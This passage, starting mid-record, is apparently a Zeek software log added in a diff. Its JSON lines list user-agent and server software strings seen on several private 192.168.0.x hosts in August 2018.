(Mozilla)"} +{"ts":"2018-08-03T23:37:58.606240Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"NSIS_Inetc (Mozilla)","unparsed_version":"NSIS_Inetc (Mozilla)"} +{"ts":"2018-08-03T23:37:58.459338Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"NSIS_Inetc (Mozilla)","unparsed_version":"NSIS_Inetc (Mozilla)"} +{"ts":"2018-08-03T23:37:58.609446Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"NSIS_Inetc (Mozilla)","unparsed_version":"NSIS_Inetc (Mozilla)"} +{"ts":"2018-08-03T23:37:58.598875Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"NSIS_Inetc (Mozilla)","unparsed_version":"NSIS_Inetc (Mozilla)"} +{"ts":"2018-08-03T23:37:58.607600Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"NSIS_Inetc (Mozilla)","unparsed_version":"NSIS_Inetc (Mozilla)"} +{"ts":"2018-08-03T23:37:58.604948Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"NSIS_Inetc (Mozilla)","unparsed_version":"NSIS_Inetc (Mozilla)"} +{"ts":"2018-08-03T23:37:58.598255Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"NSIS_Inetc (Mozilla)","unparsed_version":"NSIS_Inetc (Mozilla)"} +{"ts":"2018-08-03T23:37:58.585347Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"http_parser","unparsed_version":"http_parser"} +{"ts":"2018-08-03T23:37:58.595517Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"NSIS_Inetc (Mozilla)","unparsed_version":"NSIS_Inetc (Mozilla)"} +{"ts":"2018-08-03T23:37:58.607044Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"NSIS_Inetc (Mozilla)","unparsed_version":"NSIS_Inetc (Mozilla)"} +{"ts":"2018-08-03T23:37:58.608700Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"NSIS_Inetc (Mozilla)","unparsed_version":"NSIS_Inetc (Mozilla)"} +{"ts":"2018-08-03T23:37:58.635348Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"","unparsed_version":"Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"} +{"ts":"2018-08-03T23:37:58.634353Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"","unparsed_version":"Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"} +{"ts":"2018-08-03T23:37:59.069439Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Python-urllib","version.major":2,"version.minor":7,"unparsed_version":"Python-urllib/2.7"} +{"ts":"2018-08-03T23:37:59.071444Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"NSIS_Inetc (Mozilla)","unparsed_version":"NSIS_Inetc (Mozilla)"} +{"ts":"2018-08-03T23:37:59.050105Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"","unparsed_version":"Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"} +{"ts":"2018-08-03T23:37:59.070913Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Python-urllib","version.major":2,"version.minor":7,"unparsed_version":"Python-urllib/2.7"} +{"ts":"2018-08-03T23:37:59.387529Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"NSIS_Inetc (Mozilla)","unparsed_version":"NSIS_Inetc (Mozilla)"} +{"ts":"2018-08-03T23:38:00.222431Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"REI_SESSION","version.major":2,"unparsed_version":"REI_SESSION.2"} +{"ts":"2018-08-03T23:38:00.222020Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"REI_SESSION","version.major":2,"unparsed_version":"REI_SESSION.2"} +{"ts":"2018-08-03T23:38:00.222431Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"REI_SESSION","version.major":1,"unparsed_version":"REI_SESSION.1"} +{"ts":"2018-08-03T23:38:00.221654Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"REI_SESSION","version.major":3,"unparsed_version":"REI_SESSION.3"} +{"ts":"2018-08-03T23:38:00.301504Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"REI_SESSION","version.major":1,"unparsed_version":"REI_SESSION.1"} +{"ts":"2018-08-03T23:38:00.301504Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"REI_SESSION","version.major":2,"unparsed_version":"REI_SESSION.2"} +{"ts":"2018-08-03T23:38:00.301504Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"REI_SESSION","version.major":1,"unparsed_version":"REI_SESSION.1"} +{"ts":"2018-08-03T23:38:00.311663Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"REI_SESSION","version.major":2,"unparsed_version":"REI_SESSION.2"} +{"ts":"2018-08-03T23:38:00.311663Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"REI_SESSION","version.major":1,"unparsed_version":"REI_SESSION.1"} +{"ts":"2018-08-03T23:38:00.235183Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chilkat","version.major":1,"version.minor":0,"version.minor2":0,"version.addl":"+http://www","unparsed_version":"Chilkat/1.0.0 (+http://www.chilkatsoft.com/ChilkatHttpUA.asp)"} +{"ts":"2018-08-03T23:38:00.362271Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"REI_SESSION","version.major":2,"unparsed_version":"REI_SESSION.2"} +{"ts":"2018-08-03T23:38:00.186404Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chilkat","version.major":1,"version.minor":0,"version.minor2":0,"version.addl":"+http://www","unparsed_version":"Chilkat/1.0.0 (+http://www.chilkatsoft.com/ChilkatHttpUA.asp)"} +{"ts":"2018-08-03T23:38:00.368590Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"REI_SESSION","version.major":2,"unparsed_version":"REI_SESSION.2"} +{"ts":"2018-08-03T23:38:00.208494Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chilkat","version.major":1,"version.minor":0,"version.minor2":0,"version.addl":"+http://www","unparsed_version":"Chilkat/1.0.0 (+http://www.chilkatsoft.com/ChilkatHttpUA.asp)"} +{"ts":"2018-08-03T23:38:00.362271Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"FDSSDP","unparsed_version":"FDSSDP"} +{"ts":"2018-08-03T23:38:00.222312Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chilkat","version.major":1,"version.minor":0,"version.minor2":0,"version.addl":"+http://www","unparsed_version":"Chilkat/1.0.0 (+http://www.chilkatsoft.com/ChilkatHttpUA.asp)"} +{"ts":"2018-08-03T23:38:00.221024Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"REI_SESSION","version.major":1,"unparsed_version":"REI_SESSION.1"} +{"ts":"2018-08-03T23:38:00.403711Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"FDSSDP","unparsed_version":"FDSSDP"} +{"ts":"2018-08-03T23:38:01.473522Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"","unparsed_version":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)"} +{"ts":"2018-08-03T23:38:01.467795Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"","unparsed_version":"Mozilla/4.0 (compatible; UPnP/1.0; Windows NT/5.1)"} +{"ts":"2018-08-03T23:38:01.470673Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"FDSSDP","unparsed_version":"FDSSDP"} +{"ts":"2018-08-03T23:38:01.473745Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"","unparsed_version":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)"} +{"ts":"2018-08-03T23:38:01.471393Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"REI_SESSION","version.major":2,"unparsed_version":"REI_SESSION.2"} +{"ts":"2018-08-03T23:38:01.471393Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"","unparsed_version":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)"} +{"ts":"2018-08-03T23:38:01.471393Z","host":"192.168.0.53","host_p":2869,"software_type":"HTTP::SERVER","name":"Microsoft-HTTPAPI","version.major":1,"version.minor":0,"unparsed_version":"Microsoft-HTTPAPI/1.0"} +{"ts":"2018-08-03T23:38:01.474826Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"","unparsed_version":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)"} +{"ts":"2018-08-03T23:38:01.469368Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"","unparsed_version":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)"} +{"ts":"2018-08-03T23:38:01.475312Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"http_parser","unparsed_version":"http_parser"} +{"ts":"2018-08-03T23:38:01.475312Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"","unparsed_version":"Mozilla/4.0 (compatible; UPnP/1.0; Windows NT/5.1)"} +{"ts":"2018-08-03T23:38:01.475312Z","host":"192.168.0.53","host_p":2869,"software_type":"HTTP::SERVER","name":"Microsoft-HTTPAPI","version.major":1,"version.minor":0,"unparsed_version":"Microsoft-HTTPAPI/1.0"} +{"ts":"2018-08-03T23:38:01.475878Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"","unparsed_version":"Mozilla/4.0 (compatible; UPnP/1.0; Windows NT/5.1)"} +{"ts":"2018-08-03T23:38:01.470903Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"","unparsed_version":"Mozilla/4.0 (compatible; UPnP/1.0; Windows NT/5.1)"} +{"ts":"2018-08-03T23:38:01.550328Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Python-urllib","version.major":2,"version.minor":7,"unparsed_version":"Python-urllib/2.7"} +{"ts":"2018-08-03T23:38:01.536052Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"","unparsed_version":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)"} +{"ts":"2018-08-03T23:38:01.644299Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"","unparsed_version":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)"} +{"ts":"2018-08-03T23:38:01.586645Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Python-urllib","version.major":2,"version.minor":7,"unparsed_version":"Python-urllib/2.7"} +{"ts":"2018-08-03T23:38:01.673863Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Python-urllib","version.major":2,"version.minor":7,"unparsed_version":"Python-urllib/2.7"} +{"ts":"2018-08-03T23:38:01.713700Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Python-urllib","version.major":2,"version.minor":7,"unparsed_version":"Python-urllib/2.7"} +{"ts":"2018-08-03T23:38:01.593429Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"","unparsed_version":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)"} +{"ts":"2018-08-03T23:38:01.674364Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Python-urllib","version.major":2,"version.minor":7,"unparsed_version":"Python-urllib/2.7"} +{"ts":"2018-08-03T23:38:01.637174Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"","unparsed_version":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)"} +{"ts":"2018-08-03T23:38:01.610141Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"McAfee Agent","unparsed_version":"McAfee Agent"} +{"ts":"2018-08-03T23:38:01.598944Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"","unparsed_version":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)"} +{"ts":"2018-08-03T23:38:02.060066Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Python-urllib","version.major":2,"version.minor":7,"unparsed_version":"Python-urllib/2.7"} +{"ts":"2018-08-03T23:38:02.150733Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Python-urllib","version.major":2,"version.minor":7,"unparsed_version":"Python-urllib/2.7"} +{"ts":"2018-08-03T23:38:02.176120Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"","unparsed_version":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)"} +{"ts":"2018-08-03T23:38:02.182073Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"","unparsed_version":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)"} +{"ts":"2018-08-03T23:38:02.175610Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Python-urllib","version.major":2,"version.minor":7,"unparsed_version":"Python-urllib/2.7"} +{"ts":"2018-08-03T23:38:02.158222Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"","unparsed_version":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)"} +{"ts":"2018-08-03T23:38:02.294950Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Python-urllib","version.major":2,"version.minor":7,"unparsed_version":"Python-urllib/2.7"} +{"ts":"2018-08-03T23:38:02.275866Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"","unparsed_version":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)"} +{"ts":"2018-08-03T23:38:02.520003Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Python-urllib","version.major":2,"version.minor":7,"unparsed_version":"Python-urllib/2.7"} +{"ts":"2018-08-03T23:38:02.528951Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chilkat","version.major":1,"version.minor":0,"version.minor2":0,"version.addl":"+http://www","unparsed_version":"Chilkat/1.0.0 (+http://www.chilkatsoft.com/ChilkatHttpUA.asp)"} +{"ts":"2018-08-03T23:38:02.988971Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chilkat","version.major":1,"version.minor":0,"version.minor2":0,"version.addl":"+http://www","unparsed_version":"Chilkat/1.0.0 (+http://www.chilkatsoft.com/ChilkatHttpUA.asp)"} +{"ts":"2018-08-03T23:38:02.988602Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Python-urllib","version.major":2,"version.minor":7,"unparsed_version":"Python-urllib/2.7"} +{"ts":"2018-08-03T23:38:02.988602Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"REI_SESSION","version.major":1,"unparsed_version":"REI_SESSION.1"} +{"ts":"2018-08-03T23:38:03.021307Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chilkat","version.major":1,"version.minor":0,"version.minor2":0,"version.addl":"+http://www","unparsed_version":"Chilkat/1.0.0 (+http://www.chilkatsoft.com/ChilkatHttpUA.asp)"} +{"ts":"2018-08-03T23:38:03.017081Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chilkat","version.major":1,"version.minor":0,"version.minor2":0,"version.addl":"+http://www","unparsed_version":"Chilkat/1.0.0 (+http://www.chilkatsoft.com/ChilkatHttpUA.asp)"} +{"ts":"2018-08-03T23:38:02.974374Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chilkat","version.major":1,"version.minor":0,"version.minor2":0,"version.addl":"+http://www","unparsed_version":"Chilkat/1.0.0 (+http://www.chilkatsoft.com/ChilkatHttpUA.asp)"} +{"ts":"2018-08-03T23:38:02.990461Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chilkat","version.major":1,"version.minor":0,"version.minor2":0,"version.addl":"+http://www","unparsed_version":"Chilkat/1.0.0 (+http://www.chilkatsoft.com/ChilkatHttpUA.asp)"} +{"ts":"2018-08-03T23:38:02.981664Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Python-urllib","version.major":2,"version.minor":7,"unparsed_version":"Python-urllib/2.7"} +{"ts":"2018-08-03T23:38:02.985987Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chilkat","version.major":1,"version.minor":0,"version.minor2":0,"version.addl":"+http://www","unparsed_version":"Chilkat/1.0.0 (+http://www.chilkatsoft.com/ChilkatHttpUA.asp)"} +{"ts":"2018-08-03T23:38:03.178841Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Python-urllib","version.major":2,"version.minor":7,"unparsed_version":"Python-urllib/2.7"} +{"ts":"2018-08-03T23:38:03.270671Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Python-urllib","version.major":2,"version.minor":7,"unparsed_version":"Python-urllib/2.7"} +{"ts":"2018-08-03T23:38:03.715141Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Thunderbird","version.major":31,"version.minor":2,"version.minor2":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Thunderbird/31.2.0"} +{"ts":"2018-08-03T23:38:03.756719Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Python-urllib","version.major":2,"version.minor":7,"unparsed_version":"Python-urllib/2.7"} +{"ts":"2018-08-03T23:38:04.525024Z","host":"192.168.0.53","host_p":2869,"software_type":"HTTP::SERVER","name":"Microsoft-HTTPAPI","version.major":1,"version.minor":0,"unparsed_version":"Microsoft-HTTPAPI/1.0"} +{"ts":"2018-08-03T23:38:04.525492Z","host":"192.168.0.53","host_p":2869,"software_type":"HTTP::SERVER","name":"Microsoft-HTTPAPI","version.major":1,"version.minor":0,"unparsed_version":"Microsoft-HTTPAPI/1.0"} +{"ts":"2018-08-03T23:38:04.525200Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chilkat","version.major":1,"version.minor":0,"version.minor2":0,"version.addl":"+http://www","unparsed_version":"Chilkat/1.0.0 (+http://www.chilkatsoft.com/ChilkatHttpUA.asp)"} +{"ts":"2018-08-03T23:38:04.535292Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Unspecified WebKit","version.major":538,"version.minor":1,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/538.1 (KHTML, like Gecko) HipChat/2.2.1328 Safari/538.1"} +{"ts":"2018-08-03T23:38:04.546852Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"ISX Download DLL","unparsed_version":"ISX Download DLL"} +{"ts":"2018-08-03T23:38:04.548590Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"FDSSDP","unparsed_version":"FDSSDP"} +{"ts":"2018-08-03T23:38:04.528068Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"ISX Download DLL","unparsed_version":"ISX Download DLL"} +{"ts":"2018-08-03T23:38:04.513067Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft NCSI","unparsed_version":"Microsoft NCSI"} +{"ts":"2018-08-03T23:38:04.538472Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"FDSSDP","unparsed_version":"FDSSDP"} +{"ts":"2018-08-03T23:38:04.558638Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"FDSSDP","unparsed_version":"FDSSDP"} +{"ts":"2018-08-03T23:38:04.535691Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"MICROSOFT_DEVICE_METADATA_RETRIEVAL_CLIENT","unparsed_version":"MICROSOFT_DEVICE_METADATA_RETRIEVAL_CLIENT"} +{"ts":"2018-08-03T23:38:04.530184Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"MICROSOFT_DEVICE_METADATA_RETRIEVAL_CLIENT","unparsed_version":"MICROSOFT_DEVICE_METADATA_RETRIEVAL_CLIENT"} +{"ts":"2018-08-03T23:38:04.602253Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Unspecified WebKit","version.major":538,"version.minor":1,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/538.1 (KHTML, like Gecko) HipChat/2.2.1328 Safari/538.1"} +{"ts":"2018-08-03T23:38:04.548590Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Windows-Update-Agent","unparsed_version":"Windows-Update-Agent"} +{"ts":"2018-08-03T23:38:04.632478Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"ISX Download DLL","unparsed_version":"ISX Download DLL"} +{"ts":"2018-08-03T23:38:04.630303Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"FDSSDP","unparsed_version":"FDSSDP"} +{"ts":"2018-08-03T23:38:05.518821Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Unspecified WebKit","version.major":538,"version.minor":1,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) HipChat/2.2.1328 Safari/538.1"} +{"ts":"2018-08-03T23:38:06.103260Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::APPSERVER","name":"PHP","version.major":5,"version.minor":4,"version.minor2":16,"unparsed_version":"PHP/5.4.16"} +{"ts":"2018-08-03T23:38:06.535819Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"curl","version.major":7,"version.minor":37,"version.minor2":1,"unparsed_version":"curl/7.37.1"} +{"ts":"2018-08-03T23:38:06.539932Z","host":"192.168.0.1","software_type":"HTTP::BROWSER","name":"curl","version.major":7,"version.minor":37,"version.minor2":1,"unparsed_version":"curl/7.37.1"} +{"ts":"2018-08-03T23:38:07.239066Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"","unparsed_version":"Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"} +{"ts":"2018-08-03T23:38:07.634540Z","host":"192.168.0.53","software_type":"SMTP::MAIL_CLIENT","name":"Microsoft Outlook Express","version.major":6,"version.minor":0,"version.minor2":2900,"version.minor3":5512,"unparsed_version":"Microsoft Outlook Express 6.00.2900.5512"} +{"ts":"2018-08-03T23:38:07.615193Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft Office","version.major":14,"version.minor":0,"version.addl":"Windows","unparsed_version":"Microsoft Office/14.0 (Windows NT 6.1; Microsoft Word 14.0.7128; Pro)"} +{"ts":"2018-08-03T23:38:07.620228Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft Office","version.major":14,"version.minor":0,"version.addl":"Windows","unparsed_version":"Microsoft Office/14.0 (Windows NT 6.1; Microsoft Word 14.0.7128; Pro)"} +{"ts":"2018-08-03T23:38:07.635760Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Unspecified WebKit","version.major":538,"version.minor":1,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/538.1 (KHTML, like Gecko) HipChat/2.2.1328 Safari/538.1"} +{"ts":"2018-08-03T23:38:07.620061Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft Office","version.major":14,"version.minor":0,"version.addl":"Windows","unparsed_version":"Microsoft Office/14.0 (Windows NT 6.1; Microsoft Word 14.0.7128; Pro)"} +{"ts":"2018-08-03T23:38:07.621411Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft Office","version.major":14,"version.minor":0,"version.addl":"Windows","unparsed_version":"Microsoft Office/14.0 (Windows NT 6.1; Microsoft Word 14.0.7128; Pro)"} +{"ts":"2018-08-03T23:38:07.620884Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft Office","version.major":14,"version.minor":0,"version.addl":"Windows","unparsed_version":"Microsoft Office/14.0 (Windows NT 6.1; Microsoft Word 14.0.7128; Pro)"} +{"ts":"2018-08-03T23:38:08.141643Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"FDSSDP","unparsed_version":"FDSSDP"} +{"ts":"2018-08-03T23:38:08.175020Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"OutlookSocialConnector","version.major":1,"version.minor":0,"unparsed_version":"OutlookSocialConnector/1.0"} +{"ts":"2018-08-03T23:38:08.424175Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"SkypeSetupLight","unparsed_version":"SkypeSetupLight"} +{"ts":"2018-08-03T23:38:08.419543Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"SkypeSetupLight","unparsed_version":"SkypeSetupLight"} +{"ts":"2018-08-03T23:38:08.419273Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"SkypeSetupLight","unparsed_version":"SkypeSetupLight"} +{"ts":"2018-08-03T23:38:09.723770Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"","version.major":7,"version.minor":2,"version.minor2":0,"version.minor3":103,"unparsed_version":"7.2.0.103"} +{"ts":"2018-08-03T23:38:09.896329Z","host":"192.168.0.53","host_p":2869,"software_type":"HTTP::SERVER","name":"Microsoft-HTTPAPI","version.major":1,"version.minor":0,"unparsed_version":"Microsoft-HTTPAPI/1.0"} +{"ts":"2018-08-03T23:38:09.724079Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"SkypeSetupLight","unparsed_version":"SkypeSetupLight"} +{"ts":"2018-08-03T23:38:09.875709Z","host":"192.168.0.53","host_p":2869,"software_type":"HTTP::SERVER","name":"Microsoft-HTTPAPI","version.major":1,"version.minor":0,"unparsed_version":"Microsoft-HTTPAPI/1.0"} +{"ts":"2018-08-03T23:38:09.873103Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Skype\u0099","version.major":7,"version.minor":2,"unparsed_version":"Skype\u0099 7.2"} +{"ts":"2018-08-03T23:38:09.753813Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Skype\u0099","version.major":7,"version.minor":2,"unparsed_version":"Skype\u0099 7.2"} +{"ts":"2018-08-03T23:38:09.885531Z","host":"192.168.0.53","host_p":2869,"software_type":"HTTP::SERVER","name":"Microsoft-HTTPAPI","version.major":1,"version.minor":0,"unparsed_version":"Microsoft-HTTPAPI/1.0"} +{"ts":"2018-08-03T23:38:10.106950Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft Office","version.major":14,"version.minor":0,"version.addl":"Windows","unparsed_version":"Microsoft Office/14.0 (Windows NT 6.1; Microsoft Word 14.0.7128; Pro)"} +{"ts":"2018-08-03T23:38:09.909197Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Office Source Engine","unparsed_version":"Office Source Engine"} +{"ts":"2018-08-03T23:38:10.111477Z","host":"192.168.0.53","host_p":2869,"software_type":"HTTP::SERVER","name":"Microsoft-HTTPAPI","version.major":1,"version.minor":0,"unparsed_version":"Microsoft-HTTPAPI/1.0"} +{"ts":"2018-08-03T23:38:10.108775Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft Office","version.major":14,"version.minor":0,"version.addl":"Windows","unparsed_version":"Microsoft Office/14.0 (Windows NT 6.1; Microsoft Word 14.0.7128; Pro)"} +{"ts":"2018-08-03T23:38:10.108362Z","host":"192.168.0.53","host_p":2869,"software_type":"HTTP::SERVER","name":"Microsoft-HTTPAPI","version.major":1,"version.minor":0,"unparsed_version":"Microsoft-HTTPAPI/1.0"} +{"ts":"2018-08-03T23:38:10.101867Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"FDSSDP","unparsed_version":"FDSSDP"} +{"ts":"2018-08-03T23:38:10.102660Z","host":"192.168.0.53","host_p":2869,"software_type":"HTTP::SERVER","name":"Microsoft-HTTPAPI","version.major":1,"version.minor":0,"unparsed_version":"Microsoft-HTTPAPI/1.0"} +{"ts":"2018-08-03T23:38:10.749287Z","host":"192.168.0.53","host_p":2869,"software_type":"HTTP::SERVER","name":"Microsoft-HTTPAPI","version.major":1,"version.minor":0,"unparsed_version":"Microsoft-HTTPAPI/1.0"} +{"ts":"2018-08-03T23:38:11.983149Z","host":"192.168.0.53","host_p":2869,"software_type":"HTTP::SERVER","name":"Microsoft-HTTPAPI","version.major":1,"version.minor":0,"unparsed_version":"Microsoft-HTTPAPI/1.0"} +{"ts":"2018-08-03T23:38:11.983289Z","host":"192.168.0.53","host_p":2869,"software_type":"HTTP::SERVER","name":"Microsoft-HTTPAPI","version.major":1,"version.minor":0,"unparsed_version":"Microsoft-HTTPAPI/1.0"} +{"ts":"2018-08-03T23:38:11.978682Z","host":"192.168.0.53","host_p":2869,"software_type":"HTTP::SERVER","name":"Microsoft-HTTPAPI","version.major":1,"version.minor":0,"unparsed_version":"Microsoft-HTTPAPI/1.0"} +{"ts":"2018-08-03T23:38:12.134799Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Unspecified WebKit","version.major":538,"version.minor":1,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/538.1 (KHTML, like Gecko) HipChat/2.2.1328 Safari/538.1"} +{"ts":"2018-08-03T23:38:12.134799Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Skype\u0099","version.major":7,"version.minor":2,"unparsed_version":"Skype\u0099 7.2"} +{"ts":"2018-08-03T23:38:12.110707Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft NCSI","unparsed_version":"Microsoft NCSI"} +{"ts":"2018-08-03T23:38:12.135306Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"FDSSDP","unparsed_version":"FDSSDP"} +{"ts":"2018-08-03T23:38:12.262909Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"HelpSupportServices","unparsed_version":"HelpSupportServices"} +{"ts":"2018-08-03T23:38:12.275826Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"HelpSupportServices","unparsed_version":"HelpSupportServices"} +{"ts":"2018-08-03T23:38:12.287387Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"HelpSupportServices","unparsed_version":"HelpSupportServices"} 